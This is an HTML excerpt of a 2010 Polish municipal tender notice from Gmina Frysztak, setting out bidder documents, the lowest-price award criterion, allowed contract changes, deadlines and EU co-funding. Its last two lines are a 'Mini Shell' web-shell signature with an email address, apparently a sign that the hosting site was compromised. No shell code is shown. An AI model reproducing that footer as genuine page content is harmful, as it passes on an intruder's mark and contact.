<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia wadium
2. Kosztorys ofertowy według załączonych przedmiarów robót
3.Wykaz  części zamówienia , które Wykonawca zamierza powierzyć podwykonawcom , którzy będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat zakresu wykonywanych przez  nich czynności
4.Wykaz osób do kontaktu 
5 Parafowany wzór umowy 
6.Oświadczenie Wykonawcy o dokonaniu wizji w terenie poświadczone przez upoważnionego pracownika Zamawiającego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian w umowie na poniższych warunkach:
1. w przypadku zmiany stawki podatku VAT przez władze ustawodawcza w trakcie trwania
umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku
akcyzowego,
2. w przypadku wystąpienia siły wyższej tj.
a) działania i zamieszki wojenne,
b) ataki terrorystyczne,
c)klęski  żywiołowe  spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi,osuwiska 
d)ekonomiczne następstwa globalnego kryzysu finansowego,
3.) działania niekorzystnych czynników atmosferycznych tj. intensywnych opadów deszczu, gradu , wysokich temperatur pow. + 30 stopni C o czas okres udokumentowany przez Wykonawcę na podstawie prowadzonej ewidencji stanu pogody
4. związanej z koniecznością dokonania zmian projektowych i uzyskania odpowiednich zezwoleń i uzgodnień - o czas niezbędny do dokonania tych czynności,uniemożliwiających wykonanie zamówienia w terminie umownym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frysztak.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Frysztak ul.Ks.W.Blajera 20, 38-130 Frysztak.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:30, miejsce: Urząd Gminy w Frysztak ,  ul. Ks.W. Blajera 20, 38-130 Frysztak  pok. nr 8  (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt objęty częściowo dofinansowaniem w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com